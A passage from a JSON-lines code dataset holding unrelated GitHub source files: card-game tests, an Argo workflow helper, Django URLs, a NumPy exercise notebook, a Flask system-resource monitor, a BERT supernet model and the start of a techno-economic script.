stack); 1 from playing_stack\n assert len(list(g.pick_cards(3))) == 3\n # reshuffle from playing_stack happend\n assert len(g.stack) == 17\n assert len(g.playing_stack) == 1\n # the same card is still on top in the playing stack\n assert g.status(\"p1\").get(\"deck_top\") == \"C-K\"\n\n\ndef test_special_7a(default_game):\n g = default_game\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n # play cards until ?-7 is possible\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n\n # play first 7\n g.action(\"p1\", \"play_card\", \"S-7\")\n assert len(g.players[\"p1\"].cards) == 3\n # play 7 against\n g.action(\"p2\", \"play_card\", \"H-7\")\n # \"p1\" has no ?-7 so will get 4 cards\n g.action(\"p1\", \"take_card\")\n assert len(g.players[\"p1\"].cards) == 3 + 2 + 2\n\n\ndef test_special_7b(default_game):\n g = default_game\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n # play cards until ?-7 is possible\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n\n # play first 7\n g.action(\"p1\", \"play_card\", \"S-7\")\n assert len(g.players[\"p2\"].cards) == 3\n assert g.status(\"p2\").get(\"your_turn\")\n # don't play 7 - but something else\n g.action(\"p2\", \"play_card\", \"H-A\")\n # no card was played, but a message to take_cards\n assert g.status(\"p2\").get(\"your_turn\")\n g.action(\"p2\", \"take_cards\")\n # the cards can be played, so still in_flow\n assert len(g.players[\"p2\"].cards) == 3\n # play one of the 2 cards\n assert \"specify\" in g.action(\"p2\", \"play_card\").get(\"msg\")\n # the error message tells us, to specify one\n g.action(\"p2\", \"play_card\", \"S-8\")\n\n # \"p2\" has not played a 7, but played a card so it has 1 more card\n assert len(g.status(\"p2\").get(\"your_deck\")) == 3 + 1\n # because of the 8 one more card to play\n g.action(\"p2\", \"play_card\", \"S-K\")\n assert len(g.players[\"p2\"].cards) == 3\n # turn ends\n assert g.status(\"p2\").get(\"current_player\") == \"p1\"\n\n\ndef test_special_8(default_game):\n g = default_game\n g.current_player = \"p1\"\n # check hand\n assert g.players[\"p1\"].cards == [\"S-7\", \"C-8\", \"S-9\", \"C-A\", \"C-Q\"]\n assert 
g.players[\"p2\"].cards == [\"S-J\", \"H-7\", \"H-J\", \"D-9\", \"H-A\"]\n\n assert g.status(\"p1\").get(\"deck_top\") == \"D-K\"\n # take cards until C-? is on top\n while True:\n c = next(g.pick_cards(1))\n g.playing_stack.extend([c])\n if c[0] == \"C\":\n break\n assert len(g.playing_stack) == 4\n assert g.status(\"p2\").get(\"deck_top\") == \"C-J\"\n\n # play ?-8\n assert g.status(\"p1\").get(\"your_turn\")\n g.action(\"p1\", \"play_card\", \"C-8\")\n # p2 was deferred\n assert g.status(\"p1\").get(\"your_turn\")\n","repo_name":"mfa/cardgames","sub_path":"app/games/test_maumau.py","file_name":"test_maumau.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3402847671","text":"import contextlib\nfrom argo_workflow_tools.dsl import building_mode_context as context\nfrom argo_workflow_tools.dsl.input_definition import InputDefinition, SourceType\n\ndef merge_conditional_results(*args) -> InputDefinition:\n if not context.dag_building_mode.get():\n for arg in args:\n if arg:\n return arg\n return None\n else:\n values = \"\"\n for arg in args:\n values += f\"tasks['{arg.source_node_id}'].outputs != nil ? tasks['{arg.source_node_id}'].outputs.parameters.result : \"\n values += \"nil\"\n return InputDefinition(name=\"merge_result\", source_type=SourceType.NODE_OUTPUT, value=values, is_expression=True)\n","repo_name":"DiagnosticRobotics/argo-workflow-tools","sub_path":"argo_workflow_tools/merge_result.py","file_name":"merge_result.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"19"} +{"seq_id":"42695448937","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\n\nfrom commons import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register('account', views.AccountViewSet)\nrouter.register('organization', views.OrganizationViewSet)\nrouter.register('pamu', views.PamuViewSet)\nrouter.register('fssu', views.FssuViewSet)\nrouter.register('unit', views.UnitViewSet)\nrouter.register('serviceability', views.ServiceabilityViewSet)\nrouter.register('acquisition_mode', views.AcquisitionModeViewSet)\nrouter.register('region', views.RegionViewSet)\nrouter.register('procurement_mode', views.ProcurementModeViewSet)\nrouter.register('sprs', views.SprsViewSet)\n\n\nurlpatterns = [\n url(r'^commons/', include(router.urls)),\n url(r'^my_profile/$', views.my_profile),\n url(r'^commons/geographical_location/$', views.get_geographical_location),\n url(r'^commons/quarter/$', views.get_quarter)\n]\n","repo_name":"marvskie/palmis","sub_path":"commons/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5689186358","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Numpy_Assignment_2::\n\n# ## Question:1\n\n# ### Convert a 1D array to a 2D array with 2 rows?\n\n# #### Desired output::\n\n# array([[0, 1, 2, 3, 4],\n# [5, 6, 7, 8, 9]])\n\n# In[2]:\n\n\nimport numpy as np\n\n\n# In[3]:\n\n\nx=np.array([0,1,2,3,4,5,6,7,8,9])\nx\n\n\n# In[4]:\n\n\nx.ndim\n\n\n# In[5]:\n\n\nx=np.reshape(x,(2,5))\nx\n\n\n# In[6]:\n\n\nx.ndim\n\n\n# ## Question:2\n\n# ### How to stack two arrays vertically?\n\n# #### Desired Output::\narray([[0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1]])\n# 
In[7]:\n\n\na=np.array([0,1,2,3,4,5,6,7,8,9])\nb=np.array([1,1,1,1,1,1,1,1,1,1])\n\n\n# In[8]:\n\n\na=np.reshape(a,(2,5))\nb=np.reshape(b,(2,5))\n\n\n# In[9]:\n\n\nnp.vstack((a,b))\n\n\n# ## Question:3\n\n# ### How to stack two arrays horizontally?\n\n# #### Desired Output::\narray([[0, 1, 2, 3, 4, 1, 1, 1, 1, 1],\n [5, 6, 7, 8, 9, 1, 1, 1, 1, 1]])\n# In[10]:\n\n\nx=np.array([0,1,2,3,4,5,6,7,8,9]).reshape(2,5)\ny=np.array([1,1,1,1,1,1,1,1,1,1]).reshape(2,5)\n\n\n# In[11]:\n\n\nnp.hstack((x,y))\n\n\n# ## Question:4\n\n# ### How to convert an array of arrays into a flat 1d array?\n\n# #### Desired Output::\narray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n# In[12]:\n\n\nf=np.vstack(([0,1,2,3,4],[5,6,7,8,9]))\n\nnp.ravel(f)\n\n\n# ## Question:5\n\n# ### How to Convert higher dimension into one dimension?\n\n# #### Desired Output::\narray([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])\n# In[13]:\n\n\nnp.array([[ 0, 1, 2],\n[ 3, 4, 5],\n[ 6, 7, 8],\n[ 9, 10, 11],\n[12, 13, 14]]).ravel()\n\n\n# ## Question:6\n\n# ### Convert one dimension to higher dimension?\n\n# #### Desired Output::\narray([[ 0, 1, 2],\n[ 3, 4, 5],\n[ 6, 7, 8],\n[ 9, 10, 11],\n[12, 13, 14]])\n# In[14]:\n\n\nnp.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]).reshape(5,3)\n\n\n# ## Question:7\n\n# ### Create a 5x5 array and find the square of the array?\n\n# In[15]:\n\n\nx=np.random.randn(25).reshape(5,5)*5\nnp.array(x)\nx=np.square(x)\nx\n\n\n# ## Question:8\n\n# ### Create a 5x6 array and find the mean?\n\n# In[16]:\n\n\nx=np.random.randn(30).reshape(5,6)*5\nx=np.array(x)\nm=np.mean(x)\nm\n\n\n# In[17]:\n\n\nx\n\n\n# ## Question:9\n\n# ### Find the standard deviation of the previous array in Q8?\n\n# In[18]:\n\n\nnp.std(x)\n\n\n# ## Question:10\n\n# ### Find the median of the previous array in Q8?\n\n# In[19]:\n\n\nnp.median(x)\n\n\n# ## Question:11\n\n# ### Find the transpose of the previous array in Q8?\n\n# In[20]:\n\n\nx\n\n\n# In[21]:\n\n\nx.T\n\n\n# ## Question:12\n\n# ### Create a 4x4 array and find the sum of diagonal elements?\n\n# In[22]:\n\n\nx=np.random.randn(16).reshape(4,4)*5\nx=np.array(x)\nx\n\n\n# In[23]:\n\n\nnp.diagonal(x)\n\n\n# In[24]:\n\n\nnp.diagonal(x).sum()\n\n\n# ## Question:13\n\n# ### Find the determinant of the previous array in Q12?\n\n# In[25]:\n\n\nx\n\n\n# In[26]:\n\n\nx.shape\n\n\n# In[27]:\n\n\nnp.linalg.det(x)\n\n\n# ## Question:14\n\n# ### Find the 5th and 95th percentile of an array?\n\n# In[28]:\n\n\nx\n\n\n# In[29]:\n\n\nprint(\"5th percentile\",np.percentile(x, 5))\nprint(\"95th percentile\",np.percentile(x, 95))\n\n\n# ## Question:15\n\n# ### How to find if a given array has any null values?\n\n# In[30]:\n\n\nb = np.arange(25).reshape(5, 5) \n \nprint(\"\\nIs NaN: \\n\", np.isnan(b)) \n \nc = [[1,2,3], \n [np.nan,2,2]] \nprint(\"\\nIs NaN: \\n\", np.isnan(c))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Hashir-Ansari/Assignment","sub_path":"PIAIC101099_Assignment2.py","file_name":"PIAIC101099_Assignment2.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"21886434843","text":"# USAGE\n# Start the server:\n# \tpython app.py\n# Submit a request via cURL:\n# curl http://localhost:7000/resource\nimport os\nimport time\nimport flask\nimport json\nimport re\n\n\n# /proc/cpuinfo: CPU information\n
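# Each line looks like \"model name\\t: Intel(R) ...\"; the parser splits on\n# \"\\t: \" and keeps the last value seen for each key.\n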
\")[1]\n\n cpu_list = [\n float(result[\"processor\"]),\n float(result[\"cpu MHz\\t\"]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"cache size\"])[0]),\n float(result[\"bogomips\"]),\n ]\n return cpu_list\n\n\n# /proc/meminfo   RAM使用的相关信息\ndef meminfo():\n info = os.popen(\"cat /proc/meminfo\").read().split(\"\\n\")\n result = {}\n for i in range(len(info)):\n if info[i].find(\": \") == -1:\n continue\n result[info[i].split(\": \")[0]] = info[i].split(\": \")[1].strip()\n\n mem_list = [\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"MemFree\"])[0]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"Cached\"])[0]),\n float(re.findall(r\"\\d+\\.?\\d*\", result[\"Active\"])[0]),\n ]\n return mem_list\n\n\n# /proc/uptime  系统已经运行了多久\ndef uptime():\n info = os.popen(\"cat /proc/uptime\").read().split(\" \")\n # run time,idle time\n result = [float(info[0].strip()), float(info[1].strip())]\n return result\n\n\ndef check_status():\n result = []\n if not os.path.exists(\"./node_status_info/\"):\n os.makedirs(\"./node_status_info/\")\n\n with open(\"./node_status_info/cpu_\" + str(time.time()) + \".json\", \"w\") as file_obj:\n cpu = cpuinfo()\n json.dump(cpu, file_obj)\n result.append(cpu)\n\n with open(\"./node_status_info/mem_\" + str(time.time()) + \".json\", \"w\") as file_obj:\n mem = meminfo()\n json.dump(mem, file_obj)\n result.append(mem)\n\n with open(\n \"./node_status_info/uptime_\" + str(time.time()) + \".json\", \"w\"\n ) as file_obj:\n up_time = uptime()\n json.dump(up_time, file_obj)\n result.append(up_time)\n return result\n\n\n# CPU\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\n# initialize our Flask application and the Keras model\napp = flask.Flask(__name__)\n\n\n# 返回:{'cpu':[],'mem':[],'up_time':[]}\n# []中按照顺序依次是需要的几项\n@app.route(\"/resource\", methods=[\"GET\"])\ndef predict():\n if flask.request.method == \"GET\":\n result = check_status()\n return flask.jsonify(result)\n\n\n# if this is the main thread of execution first load the model and\n# then start the server\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=7000, threaded=True)\n","repo_name":"fwyc0573/EdgeCloudSystem","sub_path":"back-end/edge/node_resource/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"74232897643","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport sys\nimport os\nimport json\nimport copy\nimport tarfile\nimport tempfile\n\n\nimport torch\nfrom torch import embedding, nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom e2eAIOK.DeNas.module.nlp.Linear_super import LinearSuper as SuperLinear\nfrom e2eAIOK.DeNas.module.nlp.layernorm_super import LayerNormSuper as SuperBertLayerNorm\nfrom e2eAIOK.DeNas.module.nlp.bert_embedding_super import SuperBertEmbeddings\nfrom e2eAIOK.DeNas.module.nlp.bert_encoder_super import SuperBertEncoder\nfrom e2eAIOK.DeNas.module.nlp.bert_pooler_super import SuperBertPooler\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nPRETRAINED_MODEL_ARCHIVE_MAP = {\n 'bert-base-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased.tar.gz\",\n 'bert-large-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased.tar.gz\",\n 'bert-base-cased': 
\"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased.tar.gz\",\n 'bert-large-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased.tar.gz\",\n 'bert-base-multilingual-uncased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased.tar.gz\",\n 'bert-base-multilingual-cased': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased.tar.gz\",\n 'bert-base-chinese': \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese.tar.gz\",\n}\nBERT_CONFIG_NAME = 'config.json'\nCONFIG_NAME = \"config.json\"\nWEIGHTS_NAME = \"pytorch_model.bin\"\n\n\nclass BertConfig(object):\n def __init__(self,\n vocab_size_or_config_json_file,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=2,\n initializer_range=0.02,\n layer_norm_eps=1e-12):\n if isinstance(vocab_size_or_config_json_file, str) or (sys.version_info[0] == 2\n and isinstance(vocab_size_or_config_json_file, unicode)):\n with open(vocab_size_or_config_json_file, \"r\", encoding='utf-8') as reader:\n json_config = json.loads(reader.read())\n for key, value in json_config.items():\n self.__dict__[key] = value\n elif isinstance(vocab_size_or_config_json_file, int):\n self.vocab_size = vocab_size_or_config_json_file\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n self.layer_norm_eps = layer_norm_eps\n else:\n raise ValueError(\"First argument must be either a vocabulary size (int)\"\n \"or the path to a pretrained model config file (str)\")\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size_or_config_json_file=-1)\n for key, value in json_object.items():\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with open(json_file, \"r\", encoding='utf-8') as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, **kwargs):\n return_unused_kwargs = kwargs.pop('return_unused_kwargs', False)\n\n if os.path.isdir(pretrained_model_name_or_path):\n config_file = os.path.join(pretrained_model_name_or_path, CONFIG_NAME)\n else:\n config_file = pretrained_model_name_or_path\n\n # Load config\n config = cls.from_json_file(config_file)\n\n if hasattr(config, 'pruned_heads'):\n config.pruned_heads = dict((int(key), value) for key, value in config.pruned_heads.items())\n\n # Update config with kwargs if needed\n to_remove = []\n for key, value in kwargs.items():\n if hasattr(config, key):\n setattr(config, key, value)\n to_remove.append(key)\n for key in to_remove:\n kwargs.pop(key, None)\n\n logger.info(\"Model config %s\", str(config))\n if return_unused_kwargs:\n return config, kwargs\n else:\n return config\n\n def __repr__(self):\n return 
str(self.to_json_string())\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n\n def to_json_file(self, json_file_path):\n \"\"\" Save this instance to a json file.\"\"\"\n with open(json_file_path, \"w\", encoding='utf-8') as writer:\n writer.write(self.to_json_string())\n\n\nclass BertPreTrainedModel(nn.Module):\n def __init__(self, config, *inputs, **kwargs):\n super(BertPreTrainedModel, self).__init__()\n if not isinstance(config, BertConfig):\n raise ValueError(\n \"Parameter config in `{}(config)` should be an instance of class `BertConfig`. \"\n \"To create a model from a Google pretrained model use \"\n \"`model = {}.from_pretrained(PRETRAINED_MODEL_NAME)`\".format(\n self.__class__.__name__, self.__class__.__name__\n ))\n self.config = config\n\n def init_bert_weights(self, module):\n \"\"\" Initialize the weights.\n \"\"\"\n if isinstance(module, (nn.Linear, nn.Embedding)):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n elif isinstance(module, SuperBertLayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n if isinstance(module, nn.Linear) and module.bias is not None:\n module.bias.data.zero_()\n\n @classmethod\n def from_scratch(cls, pretrained_model_name_or_path, *inputs, **kwargs):\n resolved_config_file = os.path.join(pretrained_model_name_or_path, CONFIG_NAME)\n if not os.path.exists(resolved_config_file):\n resolved_config_file = os.path.join(pretrained_model_name_or_path, BERT_CONFIG_NAME)\n config = BertConfig.from_json_file(resolved_config_file)\n logger.info(\"Model config {}\".format(config))\n model = cls(*inputs, **kwargs)\n return model\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs):\n state_dict = kwargs.get('state_dict', None)\n kwargs.pop('state_dict', None)\n cache_dir = kwargs.get('cache_dir', None)\n kwargs.pop('cache_dir', None)\n from_tf = kwargs.get('from_tf', False)\n kwargs.pop('from_tf', None)\n\n if pretrained_model_name_or_path in PRETRAINED_MODEL_ARCHIVE_MAP:\n archive_file = PRETRAINED_MODEL_ARCHIVE_MAP[pretrained_model_name_or_path]\n else:\n archive_file = pretrained_model_name_or_path\n # redirect to the cache, if necessary\n try:\n resolved_archive_file = archive_file\n cache_dir=cache_dir\n except EnvironmentError:\n logger.error(\n \"Model name was not found in model name list. 
\"\n \"We assumed 'model_name' was a path or url but couldn't find any file \"\n \"associated to this path or url.\")\n return None\n if resolved_archive_file == archive_file:\n print(\"loading archive file {}\".format(archive_file))\n else:\n print(\"loading archive file {} from cache at {}\".format(\n archive_file, resolved_archive_file))\n tempdir = None\n if os.path.isdir(resolved_archive_file) or from_tf:\n serialization_dir = resolved_archive_file\n else:\n # Extract archive to temp dir\n tempdir = tempfile.mkdtemp()\n print(\"extracting archive file {} to temp dir {}\".format(\n resolved_archive_file, tempdir))\n with tarfile.open(resolved_archive_file, 'r:gz') as archive:\n archive.extractall(tempdir)\n serialization_dir = tempdir\n # Load config\n config_file = os.path.join(serialization_dir, CONFIG_NAME)\n if not os.path.exists(config_file):\n # Backward compatibility with old naming format\n config_file = os.path.join(serialization_dir, BERT_CONFIG_NAME)\n config = BertConfig.from_json_file(config_file)\n logger.info(\"Model config {}\".format(config))\n # Instantiate model.\n model = cls(*inputs, **kwargs)\n if state_dict is None and not from_tf:\n weights_path = os.path.join(serialization_dir, WEIGHTS_NAME)\n state_dict = torch.load(weights_path, map_location='cpu')\n if tempdir:\n # Clean up temp dir\n shutil.rmtree(tempdir)\n # Load from a PyTorch state_dict\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n if 'gamma' in key:\n new_key = key.replace('gamma', 'weight')\n if 'beta' in key:\n new_key = key.replace('beta', 'bias')\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n old_keys = []\n new_keys = []\n for key in state_dict.keys():\n new_key = None\n\n if 'bert' not in key:\n new_key = 'bert.' + key\n if new_key:\n if 'embedding' in key and 'LayerNorm' not in key and '.embedding.' not in key:\n tmp = new_key.split('.')\n new_key = '.'.join(tmp[:-1]) + '.embedding.' + tmp[-1]\n if 'layer' in key and 'layers' not in key:\n new_key = new_key.replace('layer', 'layers')\n else:\n if 'embedding' in key and 'LayerNorm' not in key and '.embedding.' not in key:\n tmp = key.split('.')\n new_key = '.'.join(tmp[:-1]) + '.embedding.' 
+ tmp[-1]\n if 'layer' in key and 'layers' not in key:\n new_key = key.replace('layer', 'layers')\n if 'qa_outputs' in key:\n new_key = new_key.replace(\"bert.\", \"\")\n if new_key:\n old_keys.append(key)\n new_keys.append(new_key)\n\n for old_key, new_key in zip(old_keys, new_keys):\n state_dict[new_key] = state_dict.pop(old_key)\n\n missing_keys = []\n unexpected_keys = []\n error_msgs = []\n # copy state_dict so _load_from_state_dict can modify it\n metadata = getattr(state_dict, '_metadata', None)\n state_dict = state_dict.copy()\n if metadata is not None:\n state_dict._metadata = metadata\n\n def load(module, prefix=''):\n local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})\n module._load_from_state_dict(\n state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs)\n for name, child in module._modules.items():\n if child is not None:\n load(child, prefix + name + '.')\n\n start_prefix = ''\n if not hasattr(model, 'bert') and any(s.startswith('bert.') for s in state_dict.keys()):\n start_prefix = 'bert.'\n #print(\"!!!!!model parameters!!!!!\")\n #for param_tensor in model.state_dict():\n # print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n #print(\"!!!!!saved parameters!!!!!\")\n #for param_tensor in state_dict:\n # print(param_tensor, \"\\t\", state_dict[param_tensor].size()) \n #sys.exit()\n \n load(model, prefix=start_prefix)\n #missing_keys, unexpected_keys = model.load_state_dict(state_dict)\n if len(missing_keys) > 0:\n print(\"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys))\n if len(unexpected_keys) > 0:\n print(\"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys))\n if len(error_msgs) > 0:\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\n model.__class__.__name__, \"\\n\\t\".join(error_msgs)))\n return model\n\n\nclass SuperBertModel(BertPreTrainedModel):\n def __init__(self, config, fit_size=768):\n super(SuperBertModel, self).__init__(config)\n self.embeddings = SuperBertEmbeddings(config)\n self.encoder = SuperBertEncoder(config)\n self.pooler = SuperBertPooler(config)\n self.dense_fit = SuperLinear(config.hidden_size, fit_size)\n\n self.hidden_size = config.hidden_size\n self.qkv_size = self.hidden_size\n\n try:\n self.qkv_size = config.qkv_size\n except:\n self.qkv_size = config.hidden_size\n\n self.fit_size = fit_size\n self.head_number = config.num_attention_heads\n self.apply(self.init_bert_weights)\n\n def set_sample_config(self, subbert_config):\n self.embeddings.set_sample_config(subbert_config['sample_hidden_size'])\n self.encoder.set_sample_config(subbert_config)\n self.pooler.set_sample_config(subbert_config['sample_hidden_size'])\n\n def calc_sampled_param_num(self):\n emb_numel = self.embeddings.calc_sampled_param_num()\n encoder_numel = self.encoder.calc_sampled_param_num()\n pooler_numel = self.pooler.calc_sampled_param_num()\n\n #logger.info('===========================')\n #logger.info('emb_numel: {}\\n'.format(emb_numel))\n #logger.info('encoder_numel: {}\\n'.format(encoder_numel))\n #logger.info('pooler_numel: {}\\n'.format(pooler_numel))\n #logger.info('all parameters: {}\\n'.format(emb_numel + encoder_numel + pooler_numel))\n #logger.info('===========================')\n return emb_numel + encoder_numel + pooler_numel\n\n def forward(self, input_ids, \n attention_mask=None, token_type_ids=None):\n\n if attention_mask is None:\n attention_mask 
= torch.ones_like(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n \n embedding_output = self.embeddings(input_ids,\n token_type_ids=token_type_ids)\n\n \n all_encoder_layers, all_encoder_att = self.encoder(embedding_output, extended_attention_mask)\n sequence_output = all_encoder_layers[-1]\n pooled_output = self.pooler(sequence_output)\n return all_encoder_layers[-1], pooled_output\n\n\nclass SuperBertForQuestionAnswering(BertPreTrainedModel):\n def __init__(self, config):\n super(SuperBertForQuestionAnswering, self).__init__(config)\n self.bert = SuperBertModel(config)\n self.qa_outputs = SuperLinear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def set_sample_config(self, subbert_config):\n self.bert.set_sample_config(subbert_config)\n self.qa_outputs.set_sample_config(subbert_config['sample_hidden_size'], 2)\n\n def calc_sampled_param_num(self):\n return self.bert.calc_sampled_param_num()\n\n def save_pretrained(self, save_directory):\n\n assert os.path.isdir(save_directory), \"Saving path should be a directory where \" \\\n \"the model and configuration can be saved\"\n\n # Only save the model it-self if we are using distributed training\n model_to_save = self.module if hasattr(self, 'module') else self\n\n # Save configuration file\n model_to_save.config.save_pretrained(save_directory)\n\n # If we save using the predefined names, we can load using `from_pretrained`\n output_model_file = os.path.join(save_directory, WEIGHTS_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n logger.info(\"Model weights saved in {}\".format(output_model_file))\n\n def forward(self, x):\n\n input_ids, attention_mask, token_type_ids = x.split(1, -1)\n input_ids = input_ids.squeeze(-1)\n attention_mask = attention_mask.squeeze(-1)\n token_type_ids = token_type_ids.squeeze(-1)\n encoded_layers, pooled_output = self.bert(input_ids, \n attention_mask=attention_mask,\n token_type_ids=token_type_ids)\n last_sequence_output = encoded_layers\n \n logits = self.qa_outputs(last_sequence_output)\n start_logits, end_logits = logits.split(1, dim=-1)\n start_logits = start_logits.squeeze(-1)\n end_logits = end_logits.squeeze(-1)\n\n logits = torch.cat((start_logits, end_logits), -1)\n\n return logits\n\n\nclass CrossEntropyQALoss(nn.Module):\n def __init__(self, ignored_index):\n super(CrossEntropyQALoss, self).__init__()\n self.ignored_index = ignored_index\n self.loss = CrossEntropyLoss(ignore_index=ignored_index)\n\n def forward(self, output, target):\n target_s, target_e = torch.split(target, int(target.size()[-1]/2), -1)\n output_s, output_e = torch.split(output, int(output.size()[-1]/2), -1)\n if len(target_s.size()) > 1:\n target_s = target_s.squeeze(-1)\n if len(target_e.size()) > 1:\n target_e = target_e.squeeze(-1)\n if len(output_s.size()) > 1:\n output_s = output_s.squeeze(-1)\n if len(output_e.size()) > 1:\n output_e = output_e.squeeze(-1)\n target_s.clamp_(0, self.ignored_index)\n target_e.clamp_(0, self.ignored_index)\n start_loss = self.loss(output_s, target_s)\n end_loss = self.loss(output_e, target_e)\n cls_loss = (start_loss + end_loss) / 2\n return cls_loss 
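# average of the start- and end-position losses, as in standard BERT QA heads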
\n\n","repo_name":"intel/e2eAIOK","sub_path":"e2eAIOK/DeNas/nlp/supernet_bert.py","file_name":"supernet_bert.py","file_ext":"py","file_size_in_byte":19589,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"71029157162","text":"import matplotlib.transforms as transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pygal\nimport io\nfrom matplotlib.figure import Figure\nimport io\nfrom matplotlib.backends.backend_svg import FigureCanvasSVG\n\n# _______________________ Inputs _________________________\n# Economic Parameters\nproduct_production = 100000 # [kg/day]\nproduct_price = 1445 # [$/ton]\noperating_time = 350 # [days/year]\nelectricity_price = 0.02 # [$/kWh]\nh2_price = 1.5 # [$/kg]\nwater_price = 0.0054/3.79 # [$/kg]\nhmf_price = 0.9095 # [$/kg]\nelectrolyzer_reference_cost = 920 # [$/m^2]\nincome_tax = 0.389\ninterest_rate = 0.1 # Nominal\nplant_lifetime = 20 # [years]\n\n# Lab Parameters\ncurrent_density = 0.05 # [A/cm^2]\ncell_voltage = 1.4 # [V]\nfaradaic_efficiency = 1\nfdca_yield = 0.98\nelectrolyte_density = 2.13 # [kg/L]\n\n# # Constants\n# product_MW = 156.093 # [g/mol]\n# product_density = 1.6 # 